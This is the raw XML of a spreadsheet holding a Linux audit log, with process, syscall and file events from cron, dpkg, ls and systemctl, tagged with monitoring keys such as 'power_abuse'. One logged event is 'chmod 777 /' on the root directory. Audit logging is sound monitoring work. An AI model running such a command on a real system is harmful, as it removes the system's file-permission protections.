    <t>a2="-ignore_readdir_race" a3="-lname" a4="/var/lib/php/sessions/sess_*" a5="-exec" a6="touch"</t>
  </si>
  <si>
    <t>a7="-c" a8="{}" a9=";"</t>
  </si>
  <si>
    <t>pid=3942</t>
  </si>
  <si>
    <t>a1="/proc/1156/fd"</t>
  </si>
  <si>
    <t>pid=3943</t>
  </si>
  <si>
    <t>a1="/proc/1155/fd"</t>
  </si>
  <si>
    <t>pid=3944</t>
  </si>
  <si>
    <t>a1="/proc/1154/fd"</t>
  </si>
  <si>
    <t>pid=3945</t>
  </si>
  <si>
    <t>a1="/proc/1153/fd"</t>
  </si>
  <si>
    <t>pid=3946</t>
  </si>
  <si>
    <t>a1="/proc/1098/fd"</t>
  </si>
  <si>
    <t>a0=55742b6ac248</t>
  </si>
  <si>
    <t>a1=55742b6ac1a0</t>
  </si>
  <si>
    <t>a2=55742b6ac218</t>
  </si>
  <si>
    <t>ppid=3906</t>
  </si>
  <si>
    <t>pid=3947</t>
  </si>
  <si>
    <t>argc=14</t>
  </si>
  <si>
    <t>a1="-O3" a2="/var/lib/php/sessions/"</t>
  </si>
  <si>
    <t>a3="-ignore_readdir_race" a4="-depth" a5="-mindepth" a6="1"</t>
  </si>
  <si>
    <t>a7="-name" a8="sess_*" a9="-type" a10="f"</t>
  </si>
  <si>
    <t>a11="-cmin" a12="+24" a13="-delete"</t>
  </si>
  <si>
    <t>msg='unit=phpsessionclean</t>
  </si>
  <si>
    <t>exit=6</t>
  </si>
  <si>
    <t>a1=7f4f041de2a3</t>
  </si>
  <si>
    <t>ppid=825</t>
  </si>
  <si>
    <t>pid=3952</t>
  </si>
  <si>
    <t>comm="cron"</t>
  </si>
  <si>
    <t>exe="/usr/sbin/cron"</t>
  </si>
  <si>
    <t>hostname=? addr=? terminal=cron</t>
  </si>
  <si>
    <t>auid=0</t>
  </si>
  <si>
    <t>ses=7</t>
  </si>
  <si>
    <t>a0=561a7332fcd6</t>
  </si>
  <si>
    <t>a1=7ffe35ab4390</t>
  </si>
  <si>
    <t>a2=561a7332fd80</t>
  </si>
  <si>
    <t>a3=7ffe35ab4430</t>
  </si>
  <si>
    <t>ppid=3952</t>
  </si>
  <si>
    <t>pid=3953</t>
  </si>
  <si>
    <t>tty=(none) ses=7</t>
  </si>
  <si>
    <t>a1="-c" a2=20205B202D78202F7573722F6C69622F7068702F73657373696F6E636C65616E205D202626206966205B2021202D64202F72756E2F73797374656D642F73797374656D205D3B207468656E202F7573722F6C69622F7068702F73657373696F6E636C65616E3B206669</t>
  </si>
  <si>
    <t>syscall=4</t>
  </si>
  <si>
    <t>a1=7ffe990b2270</t>
  </si>
  <si>
    <t>a2=7ffe990b2270</t>
  </si>
  <si>
    <t>a3=55955846ff71</t>
  </si>
  <si>
    <t>key="power_abuse"</t>
  </si>
  <si>
    <t>name="/home"</t>
  </si>
  <si>
    <t>inode=2621441</t>
  </si>
  <si>
    <t>syscall=80</t>
  </si>
  <si>
    <t>a1=559558433010</t>
  </si>
  <si>
    <t>a2=559558433010</t>
  </si>
  <si>
    <t>a0=559557dad873</t>
  </si>
  <si>
    <t>a1=7ffe990b2340</t>
  </si>
  <si>
    <t>a2=7ffe990b2340</t>
  </si>
  <si>
    <t>name="." inode=2621441</t>
  </si>
  <si>
    <t>a0=559558470e20</t>
  </si>
  <si>
    <t>a1=559558470ea0</t>
  </si>
  <si>
    <t>pid=4065</t>
  </si>
  <si>
    <t>comm="ls"</t>
  </si>
  <si>
    <t>exe="/bin/ls"</t>
  </si>
  <si>
    <t>a0="ls"</t>
  </si>
  <si>
    <t>a1="--color=auto"</t>
  </si>
  <si>
    <t>name="/bin/ls"</t>
  </si>
  <si>
    <t>inode=2228308</t>
  </si>
  <si>
    <t>a1=561c975a44a0</t>
  </si>
  <si>
    <t>a2=90800</t>
  </si>
  <si>
    <t>a1=559558470e00</t>
  </si>
  <si>
    <t>a0=559558470e00</t>
  </si>
  <si>
    <t>a1=7ffe990b1300</t>
  </si>
  <si>
    <t>a2=7ffe990b1300</t>
  </si>
  <si>
    <t>a3=559558470e01</t>
  </si>
  <si>
    <t>a0=5595584701e0</t>
  </si>
  <si>
    <t>a3=5595584701e1</t>
  </si>
  <si>
    <t>a0=5595584700c0</t>
  </si>
  <si>
    <t>a1=55955846e4d0</t>
  </si>
  <si>
    <t>pid=4068</t>
  </si>
  <si>
    <t>a0=559558470120</t>
  </si>
  <si>
    <t>pid=4073</t>
  </si>
  <si>
    <t>a2="-la"</t>
  </si>
  <si>
    <t>syscall=6</t>
  </si>
  <si>
    <t>a0=7ffe7a85b5b0</t>
  </si>
  <si>
    <t>a1=563be0685c48</t>
  </si>
  <si>
    <t>a2=563be0685c48</t>
  </si>
  <si>
    <t>name=".dbus" inode=2631491</t>
  </si>
  <si>
    <t>dev=08:01 mode=040700</t>
  </si>
  <si>
    <t>syscall=192</t>
  </si>
  <si>
    <t>exit=-61 a0=7ffe7a85b5b0</t>
  </si>
  <si>
    <t>a1=7f60267fcbbe</t>
  </si>
  <si>
    <t>a2=563be0692ad0</t>
  </si>
  <si>
    <t>a3=ff</t>
  </si>
  <si>
    <t>syscall=191</t>
  </si>
  <si>
    <t>a1=563bdf48b30b</t>
  </si>
  <si>
    <t>a1=563bdf48b323</t>
  </si>
  <si>
    <t>a1=563be0686a58</t>
  </si>
  <si>
    <t>a2=563be0686a58</t>
  </si>
  <si>
    <t>name=".." inode=2621441</t>
  </si>
  <si>
    <t>a2=563be0695d40</t>
  </si>
  <si>
    <t>a0=5591c53d1c70</t>
  </si>
  <si>
    <t>a1=5591c53d1cf0</t>
  </si>
  <si>
    <t>pid=4141</t>
  </si>
  <si>
    <t>a0=5591c53c1360</t>
  </si>
  <si>
    <t>a1=5591c53d1f20</t>
  </si>
  <si>
    <t>pid=4154</t>
  </si>
  <si>
    <t>a0="dpkg"</t>
  </si>
  <si>
    <t>a1="-i" a2="python-pip_9.0.1-2_all.deb"</t>
  </si>
  <si>
    <t>exit=-2 a0=7fff9894cf20</t>
  </si>
  <si>
    <t>a1=7fff9894d030</t>
  </si>
  <si>
    <t>a2=5642e46b1c70</t>
  </si>
  <si>
    <t>ppid=4154</t>
  </si>
  <si>
    <t>pid=4155</t>
  </si>
  <si>
    <t>name="/usr/local/sbin/dpkg-split" nametype=UNKNOWN</t>
  </si>
  <si>
    <t>name="/usr/local/bin/dpkg-split" nametype=UNKNOWN</t>
  </si>
  <si>
    <t>name="/usr/sbin/dpkg-split" nametype=UNKNOWN</t>
  </si>
  <si>
    <t>a0=7fff9894cf20</t>
  </si>
  <si>
    <t>comm="dpkg-split" exe="/usr/bin/dpkg-split" key="rootcmd"</t>
  </si>
  <si>
    <t>a0="dpkg-split" a1="-Qao" a2="/var/lib/dpkg/reassemble.deb" a3="python-pip_9.0.1-2_all.deb"</t>
  </si>
  <si>
    <t>name="/usr/bin/dpkg-split" inode=1442038</t>
  </si>
  <si>
    <t>pid=4156</t>
  </si>
  <si>
    <t>name="/usr/local/sbin/dpkg-deb" nametype=UNKNOWN</t>
  </si>
  <si>
    <t>name="/usr/local/bin/dpkg-deb" nametype=UNKNOWN</t>
  </si>
  <si>
    <t>name="/usr/sbin/dpkg-deb" nametype=UNKNOWN</t>
  </si>
  <si>
    <t>comm="dpkg-deb" exe="/usr/bin/dpkg-deb" key="rootcmd"</t>
  </si>
  <si>
    <t>a0="dpkg-deb" a1="--control" a2="python-pip_9.0.1-2_all.deb" a3="/var/lib/dpkg/tmp.ci"</t>
  </si>
  <si>
    <t>name="/usr/bin/dpkg-deb" inode=1442033</t>
  </si>
  <si>
    <t>exit=-2 a0=7ffccb42b410</t>
  </si>
  <si>
    <t>a1=55d7f7c3b4d0</t>
  </si>
  <si>
    <t>a2=7ffccb42b7e0</t>
  </si>
  <si>
    <t>a3=7fab401b1e00</t>
  </si>
  <si>
    <t>ppid=4156</t>
  </si>
  <si>
    <t>pid=4159</t>
  </si>
  <si>
    <t>name="/usr/local/sbin/tar"</t>
  </si>
  <si>
    <t>nametype=UNKNOWN</t>
  </si>
  <si>
    <t>name="/usr/local/bin/tar"</t>
  </si>
  <si>
    <t>name="/usr/sbin/tar"</t>
  </si>
  <si>
    <t>name="/usr/bin/tar"</t>
  </si>
  <si>
    <t>name="/sbin/tar"</t>
  </si>
  <si>
    <t>a0=7ffccb42b410</t>
  </si>
  <si>
    <t>comm="tar"</t>
  </si>
  <si>
    <t>exe="/bin/tar"</t>
  </si>
  <si>
    <t>a0="tar"</t>
  </si>
  <si>
    <t>a1="-x" a2="-f" a3="-" a4="--warning=no-timestamp"</t>
  </si>
  <si>
    <t>name="/bin/tar"</t>
  </si>
  <si>
    <t>inode=2228395</t>
  </si>
  <si>
    <t>a0=3</t>
  </si>
  <si>
    <t>a3=1ff</t>
  </si>
  <si>
    <t>name=(null) inode=2254075</t>
  </si>
  <si>
    <t>a2=1a4</t>
  </si>
  <si>
    <t>name=(null) inode=2254080</t>
  </si>
  <si>
    <t>name=(null) inode=2254084</t>
  </si>
  <si>
    <t>dev=08:01 mode=0100700</t>
  </si>
  <si>
    <t>a2=1ed</t>
  </si>
  <si>
    <t>name=(null) inode=2254089</t>
  </si>
  <si>
    <t>syscall=260</t>
  </si>
  <si>
    <t>a1=55cbd2b16360</t>
  </si>
  <si>
    <t>name="." inode=2250754</t>
  </si>
  <si>
    <t>a0=5642e4b20d90</t>
  </si>
  <si>
    <t>a1=5642e4b20fb0</t>
  </si>
  <si>
    <t>a2=5642e4b21250</t>
  </si>
  <si>
    <t>a3=5642e46b0010</t>
  </si>
  <si>
    <t>pid=4160</t>
  </si>
  <si>
    <t>comm="python-pip.prer" exe="/bin/dash"</t>
  </si>
  <si>
    <t>a1="/var/lib/dpkg/info/python-pip.prerm" a2="upgrade"</t>
  </si>
  <si>
    <t>a3="9.0.1-2"</t>
  </si>
  <si>
    <t>name="/var/lib/dpkg/info/python-pip.prerm" inode=2256557</t>
  </si>
  <si>
    <t>a0=55c7eab75fa0</t>
  </si>
  <si>
    <t>a1=55c7eab75c68</t>
  </si>
  <si>
    <t>a2=55c7eab75e88</t>
  </si>
  <si>
    <t>a3=55c7eab75010</t>
  </si>
  <si>
    <t>ppid=4160</t>
  </si>
  <si>
    <t>pid=4161</t>
  </si>
  <si>
    <t>a2="pyclean"</t>
  </si>
  <si>
    <t>a0=55c7eab75fd0</t>
  </si>
  <si>
    <t>a1=55c7eab75c88</t>
  </si>
  <si>
    <t>a2=55c7eab75eb8</t>
  </si>
  <si>
    <t>pid=4162</t>
  </si>
  <si>
    <t>comm="pyclean"</t>
  </si>
  <si>
    <t>a0="/usr/bin/python2"</t>
  </si>
  <si>
    <t>a1="/usr/bin/pyclean"</t>
  </si>
  <si>
    <t>a2="-p" a3="python-pip"</t>
  </si>
  <si>
    <t>name="/usr/bin/pyclean"</t>
  </si>
  <si>
    <t>inode=1448875</t>
  </si>
  <si>
    <t>name="/usr/bin/python2"</t>
  </si>
  <si>
    <t>a0=55d953b5a1e0</t>
  </si>
  <si>
    <t>a1=55d953b3e470</t>
  </si>
  <si>
    <t>a2=7fff5c7f8700</t>
  </si>
  <si>
    <t>a3=55d95358a460</t>
  </si>
  <si>
    <t>ppid=4162</t>
  </si>
  <si>
    <t>pid=4165</t>
  </si>
  <si>
    <t>a1="-c" a2=2F7573722F62696E2F64706B67202D4C20707974686F6E2D706970</t>
  </si>
  <si>
    <t>a0=557eb7002b50</t>
  </si>
  <si>
    <t>a1=557eb7002bb0</t>
  </si>
  <si>
    <t>a2=557eb863ea28</t>
  </si>
  <si>
    <t>a3=557eb863e010</t>
  </si>
  <si>
    <t>ppid=4165</t>
  </si>
  <si>
    <t>pid=4166</t>
  </si>
  <si>
    <t>a1="-L" a2="python-pip"</t>
  </si>
  <si>
    <t>exit=-2 a0=7ffdaab63130</t>
  </si>
  <si>
    <t>a1=55fcd4bddb80</t>
  </si>
  <si>
    <t>a2=7ffdaab633f8</t>
  </si>
  <si>
    <t>a3=fffffffffffffae9</t>
  </si>
  <si>
    <t>name="/usr/local/sbin/dpkg-query" nametype=UNKNOWN</t>
  </si>
  <si>
    <t>name="/usr/local/bin/dpkg-query" nametype=UNKNOWN</t>
  </si>
  <si>
    <t>name="/usr/sbin/dpkg-query" nametype=UNKNOWN</t>
  </si>
  <si>
    <t>a0=7ffdaab63130</t>
  </si>
  <si>
    <t>comm="dpkg-query" exe="/usr/bin/dpkg-query" key="rootcmd"</t>
  </si>
  <si>
    <t>a0="dpkg-query" a1="--listfiles" a2="--" a3="python-pip"</t>
  </si>
  <si>
    <t>name="/usr/bin/dpkg-query" inode=1442036</t>
  </si>
  <si>
    <t>pid=4167</t>
  </si>
  <si>
    <t>a0="dpkg-deb" a1="--fsys-tarfile" a2="python-pip_9.0.1-2_all.deb"</t>
  </si>
  <si>
    <t>a0=c</t>
  </si>
  <si>
    <t>name=(null) inode=1457597</t>
  </si>
  <si>
    <t>dev=08:01 mode=0100000</t>
  </si>
  <si>
    <t>name=(null) inode=1457598</t>
  </si>
  <si>
    <t>name=(null) inode=1713455</t>
  </si>
  <si>
    <t>name=(null) inode=1713456</t>
  </si>
  <si>
    <t>name=(null) inode=1713457</t>
  </si>
  <si>
    <t>name=(null) inode=1713458</t>
  </si>
  <si>
    <t>name=(null) inode=1713459</t>
  </si>
  <si>
    <t>name=(null) inode=1713460</t>
  </si>
  <si>
    <t>name=(null) inode=1713461</t>
  </si>
  <si>
    <t>name=(null) inode=1713462</t>
  </si>
  <si>
    <t>name=(null) inode=1713463</t>
  </si>
  <si>
    <t>name=(null) inode=1713464</t>
  </si>
  <si>
    <t>name=(null) inode=1713465</t>
  </si>
  <si>
    <t>name=(null) inode=1713466</t>
  </si>
  <si>
    <t>name=(null) inode=1713467</t>
  </si>
  <si>
    <t>name=(null) inode=1713468</t>
  </si>
  <si>
    <t>name=(null) inode=1713469</t>
  </si>
  <si>
    <t>name=(null) inode=1713470</t>
  </si>
  <si>
    <t>name=(null) inode=1713471</t>
  </si>
  <si>
    <t>name=(null) inode=1713472</t>
  </si>
  <si>
    <t>name=(null) inode=1713473</t>
  </si>
  <si>
    <t>name=(null) inode=1713474</t>
  </si>
  <si>
    <t>name=(null) inode=1713475</t>
  </si>
  <si>
    <t>name=(null) inode=1713476</t>
  </si>
  <si>
    <t>name=(null) inode=1713477</t>
  </si>
  <si>
    <t>name=(null) inode=1713478</t>
  </si>
  <si>
    <t>name=(null) inode=1713479</t>
  </si>
  <si>
    <t>name=(null) inode=1713480</t>
  </si>
  <si>
    <t>name=(null) inode=1713481</t>
  </si>
  <si>
    <t>name=(null) inode=1713482</t>
  </si>
  <si>
    <t>name=(null) inode=1713483</t>
  </si>
  <si>
    <t>name=(null) inode=1713484</t>
  </si>
  <si>
    <t>name=(null) inode=1713485</t>
  </si>
  <si>
    <t>name=(null) inode=1713486</t>
  </si>
  <si>
    <t>name=(null) inode=1713487</t>
  </si>
  <si>
    <t>name=(null) inode=1713488</t>
  </si>
  <si>
    <t>name=(null) inode=1713489</t>
  </si>
  <si>
    <t>name=(null) inode=1713490</t>
  </si>
  <si>
    <t>name=(null) inode=1713491</t>
  </si>
  <si>
    <t>name=(null) inode=1713492</t>
  </si>
  <si>
    <t>name=(null) inode=1713493</t>
  </si>
  <si>
    <t>name=(null) inode=1713494</t>
  </si>
  <si>
    <t>name=(null) inode=1713495</t>
  </si>
  <si>
    <t>name=(null) inode=1713496</t>
  </si>
  <si>
    <t>name=(null) inode=1713497</t>
  </si>
  <si>
    <t>name=(null) inode=1713498</t>
  </si>
  <si>
    <t>name=(null) inode=1713499</t>
  </si>
  <si>
    <t>name=(null) inode=1713500</t>
  </si>
  <si>
    <t>name=(null) inode=1713501</t>
  </si>
  <si>
    <t>name=(null) inode=1713502</t>
  </si>
  <si>
    <t>name=(null) inode=1713503</t>
  </si>
  <si>
    <t>name=(null) inode=1713504</t>
  </si>
  <si>
    <t>name=(null) inode=1713505</t>
  </si>
  <si>
    <t>name=(null) inode=1713506</t>
  </si>
  <si>
    <t>name=(null) inode=1713507</t>
  </si>
  <si>
    <t>name=(null) inode=1713508</t>
  </si>
  <si>
    <t>name=(null) inode=1713509</t>
  </si>
  <si>
    <t>name=(null) inode=1713510</t>
  </si>
  <si>
    <t>name=(null) inode=1713568</t>
  </si>
  <si>
    <t>name=(null) inode=1713569</t>
  </si>
  <si>
    <t>name=(null) inode=1713570</t>
  </si>
  <si>
    <t>name=(null) inode=1713571</t>
  </si>
  <si>
    <t>name=(null) inode=1713572</t>
  </si>
  <si>
    <t>name=(null) inode=1713573</t>
  </si>
  <si>
    <t>name=(null) inode=1713574</t>
  </si>
  <si>
    <t>name=(null) inode=1713575</t>
  </si>
  <si>
    <t>name=(null) inode=1713576</t>
  </si>
  <si>
    <t>name=(null) inode=1713577</t>
  </si>
  <si>
    <t>name=(null) inode=1713578</t>
  </si>
  <si>
    <t>name=(null) inode=1713579</t>
  </si>
  <si>
    <t>name=(null) inode=1713580</t>
  </si>
  <si>
    <t>name=(null) inode=1713581</t>
  </si>
  <si>
    <t>name=(null) inode=1713582</t>
  </si>
  <si>
    <t>name=(null) inode=1713583</t>
  </si>
  <si>
    <t>name=(null) inode=1713584</t>
  </si>
  <si>
    <t>name=(null) inode=1713585</t>
  </si>
  <si>
    <t>name=(null) inode=1713586</t>
  </si>
  <si>
    <t>name=(null) inode=1713587</t>
  </si>
  <si>
    <t>name=(null) inode=1713588</t>
  </si>
  <si>
    <t>name=(null) inode=1713589</t>
  </si>
  <si>
    <t>name=(null) inode=1713590</t>
  </si>
  <si>
    <t>name=(null) inode=1713591</t>
  </si>
  <si>
    <t>name=(null) inode=1713592</t>
  </si>
  <si>
    <t>name=(null) inode=1713593</t>
  </si>
  <si>
    <t>name=(null) inode=1713594</t>
  </si>
  <si>
    <t>name=(null) inode=1713595</t>
  </si>
  <si>
    <t>name=(null) inode=1713596</t>
  </si>
  <si>
    <t>name=(null) inode=1713597</t>
  </si>
  <si>
    <t>name=(null) inode=1713598</t>
  </si>
  <si>
    <t>name=(null) inode=1713599</t>
  </si>
  <si>
    <t>name=(null) inode=1713600</t>
  </si>
  <si>
    <t>name=(null) inode=1713601</t>
  </si>
  <si>
    <t>name=(null) inode=2254132</t>
  </si>
  <si>
    <t>syscall=94</t>
  </si>
  <si>
    <t>a0=5642e4b4c0b0</t>
  </si>
  <si>
    <t>name="/usr/share/doc/python-pip/changelog.Debian.gz.dpkg-new" inode=1713602</t>
  </si>
  <si>
    <t>dev=08:01 mode=0120777</t>
  </si>
  <si>
    <t>a0=5642e4b4c000</t>
  </si>
  <si>
    <t>name="/usr/share/doc/python-pip/changelog.Debian.gz.dpkg-tmp" inode=1713603</t>
  </si>
  <si>
    <t>name="/usr/share/man/man1/pip2.1.gz.dpkg-new" inode=2254134</t>
  </si>
  <si>
    <t>a3=100</t>
  </si>
  <si>
    <t>name="/usr/share/man/man1/pip2.1.gz.dpkg-tmp" inode=2254160</t>
  </si>
  <si>
    <t>a0=b</t>
  </si>
  <si>
    <t>a2=241</t>
  </si>
  <si>
    <t>name=(null) inode=2254181</t>
  </si>
  <si>
    <t>exit=-2 a0=7fff9894d4d0</t>
  </si>
  <si>
    <t>a1=7fff9894d5d0</t>
  </si>
  <si>
    <t>pid=4170</t>
  </si>
  <si>
    <t>name="/usr/local/sbin/rm"</t>
  </si>
  <si>
    <t>name="/usr/local/bin/rm"</t>
  </si>
  <si>
    <t>name="/usr/sbin/rm"</t>
  </si>
  <si>
    <t>name="/usr/bin/rm"</t>
  </si>
  <si>
    <t>name="/sbin/rm"</t>
  </si>
  <si>
    <t>a0=7fff9894d4d0</t>
  </si>
  <si>
    <t>a1="-rf" a2="--" a3="/var/lib/dpkg/tmp.ci"</t>
  </si>
  <si>
    <t>name=(null) inode=2254190</t>
  </si>
  <si>
    <t>a0=55955843c920</t>
  </si>
  <si>
    <t>a1=55955846fe10</t>
  </si>
  <si>
    <t>pid=4913</t>
  </si>
  <si>
    <t>comm="chmod"</t>
  </si>
  <si>
    <t>exe="/bin/chmod"</t>
  </si>
  <si>
    <t>a0="chmod"</t>
  </si>
  <si>
    <t>a1="777"</t>
  </si>
  <si>
    <t>a2="/"</t>
  </si>
  <si>
    <t>name="/bin/chmod"</t>
  </si>
  <si>
    <t>inode=2228253</t>
  </si>
  <si>
    <t>syscall=268</t>
  </si>
  <si>
    <t>a1=55730afa64c0</t>
  </si>
  <si>
    <t>a2=1e0</t>
  </si>
  <si>
    <t>name="/"</t>
  </si>
  <si>
    <t>inode=2</t>
  </si>
  <si>
    <t>a0=5591c53d1c50</t>
  </si>
  <si>
    <t>a1=5591c53d1d60</t>
  </si>
  <si>
    <t>pid=8935</t>
  </si>
  <si>
    <t>comm="systemctl"</t>
  </si>
  <si>
    <t>exe="/bin/systemctl"</t>
  </si>
  <si>
    <t>key="systemd"</t>
  </si>
  <si>
    <t>a0="systemctl"</t>
  </si>
  <si>
    <t>a1="restart"</t>
  </si>
  <si>
    <t>a2="network-managers"</t>
  </si>
  <si>
    <t>name="/bin/systemctl"</t>
  </si>
  <si>
    <t>inode=2228384</t>
  </si>
  <si>
    <t>a0=5591c53d2120</t>
  </si>
  <si>
    <t>a1=5591c53d21c0</t>
  </si>
  <si>
    <t>pid=8937</t>
  </si>
  <si>
    <t>pid=1947</t>
  </si>
  <si>
    <t>comm="gnome-terminal-" exe="/usr/lib/gnome-terminal/gnome-terminal-server" sig=6</t>
  </si>
  <si>
    <t>a0=5591c53d1ff0</t>
  </si>
  <si>
    <t>ppid=2174</t>
  </si>
  <si>
    <t>pid=2175</t>
  </si>
  <si>
    <t>AUDIT NUM</t>
  </si>
  <si>
    <t>TYPE</t>
  </si>
  <si>
    <t>RAW INFO</t>
  </si>
  <si>
    <t>https://jsongrid.com/json-grid</t>
  </si>
  <si>
    <t>AuditedLog.min.json</t>
  </si>
  <si>
    <t>AuditedLog.json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</si>
</sst>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/>
  </cellXfs>
  <cellStyles count="2">
    <cellStyle name="Hyperlink" xfId="1" builtinId="8"/>
    <cellStyle name="Normal" xfId="0" builtinId="0"/>
  </cellStyles>
  <dxfs count="18">
    <dxf>
      <fill>
        <patternFill>
          <bgColor rgb="FF00FF00"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <fill>
        <patternFill>
          <bgColor rgb="FF99FF66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CCFF66"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <fill>
        <patternFill>
          <bgColor rgb="FF99FF33"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <fill>
        <patternFill>
          <bgColor rgb="FFCCFF33"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <fill>
        <patternFill>
          <bgColor rgb="FFFF5050"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <fill>
        <patternFill>
          <bgColor rgb="FFFF00FF"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <color auto="1"/>
      </font>
      <fill>
        <patternFill>
          <bgColor rgb="FFFF66FF"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <fill>
        <patternFill>
          <bgColor rgb="FF00FFCC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rgb="FFFF7C80"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <fill>
        <patternFill>
          <bgColor rgb="FF6666FF"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <fill>
        <patternFill>
          <bgColor rgb="FF6699FF"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <fill>
        <patternFill>
          <bgColor rgb="FF0066FF"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <fill>
        <patternFill>
          <bgColor rgb="FF33CCCC"/>
        </patternFill>
      </fill>
    </dxf>
  </dxfs>
  <tableStyles count="0" defaultTableStyle="TableStyleMedium2" defaultPivotStyle="PivotStyleLight16"/>
  <colors>
    <mruColors>
      <color rgb="FF33CCCC"/>
      <color rgb="FF00FFCC"/>
      <color rgb="FF6699FF"/>
      <color rgb="FF0066FF"/>
      <color rgb="FF3366FF"/>
      <color rgb="FF6666FF"/>
      <color rgb="FFFF7C80"/>
      <color rgb="FFFFFF66"/>
      <color rgb="FFFFFF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uditedLog.json" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="AuditedLog.min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EBE9-8801-4E5F-BE82-1246A3C2BFC7}">
  <sheetPr codeName="Sheet1"/>
  <dimension ref="A1:AB2011"/>
  <sheetViews>
    <sheetView topLeftCell="A34" workbookViewId="0">
      <selection activeCell="E13" sqref="E13"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="14.4" x14ac:dyDescent="0.3"/>
  <cols>
    <col min="1" max="1" width="23.5546875" style="1" bestFit="1" customWidth="1"/>
    <col min="2" max="2" width="29.77734375" style="1" customWidth="1"/>
    <col min="3" max="3" width="151.21875" style="2" customWidth="1"/>
    <col min="4" max="4" width="8.88671875" style="1" customWidth="1"/>
    <col min="5" max="16384" width="8.88671875" style="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:28" x14ac:dyDescent="0.3">
      <c r="A1" s="1" t="s">
        <v>3221</v>
      </c>
      <c r="B1" s="1" t="s">
        <v>3220</v>
      </c>
      <c r="C1" s="2" t="s">
        <v>3222</v>
      </c>
    </row>
    <row r="2" spans="1:28" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A2" s="2" t="s">
        <v>0</v>
      </c>
      <c r="B2" s="2" t="s">
        <v>1</v>
      </c>
      <c r="C2" s="2" t="s">
        <v>2</v>
      </c>
      <c r="D2" s="1" t="s">
        <v>1481</v>
      </c>
      <c r="E2" s="1" t="s">
        <v>1482</v>
      </c>
      <c r="F2" s="1" t="s">
        <v>1483</v>
      </c>
      <c r="G2" s="1" t="s">
        <v>1484</v>
      </c>
      <c r="H2" s="1" t="s">
        <v>1485</v>
      </c>
      <c r="I2" s="1" t="s">
        <v>1486</v>
      </c>
      <c r="J2" s="1" t="s">
        <v>1487</v>
      </c>
      <c r="K2" s="1" t="s">
        <v>1488</v>
      </c>
      <c r="L2" s="1" t="s">
        <v>1489</v>
      </c>
      <c r="M2" s="1" t="s">
        <v>1490</v>
      </c>
      <c r="N2" s="1" t="s">
        <v>1491</v>
      </c>
      <c r="O2" s="1" t="s">
        <v>1492</v>
      </c>
      <c r="P2" s="1" t="s">
        <v>1493</v>
      </c>
      <c r="Q2" s="1" t="s">
        <v>1494</v>
      </c>
      <c r="R2" s="1" t="s">
        <v>1495</v>
      </c>
      <c r="S2" s="1" t="s">
        <v>1496</v>
      </c>
      <c r="T2" s="1" t="s">
        <v>1497</v>
      </c>
      <c r="U2" s="1" t="s">
        <v>1498</v>
      </c>
      <c r="V2" s="1" t="s">
        <v>1499</v>
      </c>
      <c r="W2" s="1" t="s">
        <v>1500</v>
      </c>
      <c r="X2" s="1" t="s">
        <v>1501</v>
      </c>
      <c r="Y2" s="1" t="s">
        <v>1502</v>
      </c>
      <c r="Z2" s="1" t="s">
        <v>1503</v>
      </c>
      <c r="AA2" s="1" t="s">
        <v>1504</v>
      </c>
      <c r="AB2" s="1" t="s">
        <v>1505</v>
      </c>
    </row>
    <row r="3" spans="1:28" x14ac:dyDescent="0.3">
      <c r="A3" s="2" t="s">
        <v>3</v>
      </c>
      <c r="B3" s="2" t="s">
        <v>1</v>
      </c>
      <c r="C3" s="2" t="s">
        <v>4</v>
      </c>
      <c r="D3" s="1" t="s">
        <v>1506</v>
      </c>
      <c r="E3" s="1" t="s">
        <v>1507</v>
      </c>
    </row>
    <row r="4" spans="1:28" x14ac:dyDescent="0.3">
      <c r="A4" s="2" t="s">
        <v>5</v>
      </c>
      <c r="B4" s="2" t="s">
        <v>1</v>
      </c>
      <c r="C4" s="2" t="s">
        <v>1211</v>
      </c>
      <c r="D4" s="1" t="s">
        <v>1508</v>
      </c>
      <c r="E4" s="1" t="s">
        <v>1509</v>
      </c>
      <c r="F4" s="1" t="s">
        <v>1510</v>
      </c>
      <c r="G4" s="1" t="s">
        <v>1511</v>
      </c>
      <c r="H4" s="1" t="s">
        <v>1512</v>
      </c>
      <c r="I4" s="1" t="s">
        <v>1513</v>
      </c>
      <c r="J4" s="1" t="s">
        <v>1514</v>
      </c>
      <c r="K4" s="1" t="s">
        <v>1515</v>
      </c>
      <c r="L4" s="1" t="s">
        <v>1516</v>
      </c>
      <c r="M4" s="1" t="s">
        <v>1517</v>
      </c>
      <c r="N4" s="1" t="s">
        <v>1518</v>
      </c>
    </row>
    <row r="5" spans="1:28" x14ac:dyDescent="0.3">
      <c r="A5" s="2" t="s">
        <v>5</v>
      </c>
      <c r="B5" s="2" t="s">
        <v>1</v>
      </c>
      <c r="C5" s="2" t="s">
        <v>1212</v>
      </c>
      <c r="D5" s="1" t="s">
        <v>1519</v>
      </c>
      <c r="E5" s="1" t="s">
        <v>1520</v>
      </c>
      <c r="F5" s="1" t="s">
        <v>1511</v>
      </c>
      <c r="G5" s="1" t="s">
        <v>1512</v>
      </c>
      <c r="H5" s="1" t="s">
        <v>1513</v>
      </c>
      <c r="I5" s="1" t="s">
        <v>1514</v>
      </c>
      <c r="J5" s="1" t="s">
        <v>1515</v>
      </c>
      <c r="K5" s="1" t="s">
        <v>1516</v>
      </c>
      <c r="L5" s="1" t="s">
        <v>1517</v>
      </c>
      <c r="M5" s="1" t="s">
        <v>1518</v>
      </c>
    </row>
    <row r="6" spans="1:28" x14ac:dyDescent="0.3">
      <c r="A6" s="2" t="s">
        <v>6</v>
      </c>
      <c r="B6" s="2" t="s">
        <v>1</v>
      </c>
      <c r="C6" s="2" t="s">
        <v>7</v>
      </c>
      <c r="D6" s="1" t="s">
        <v>7</v>
      </c>
    </row>
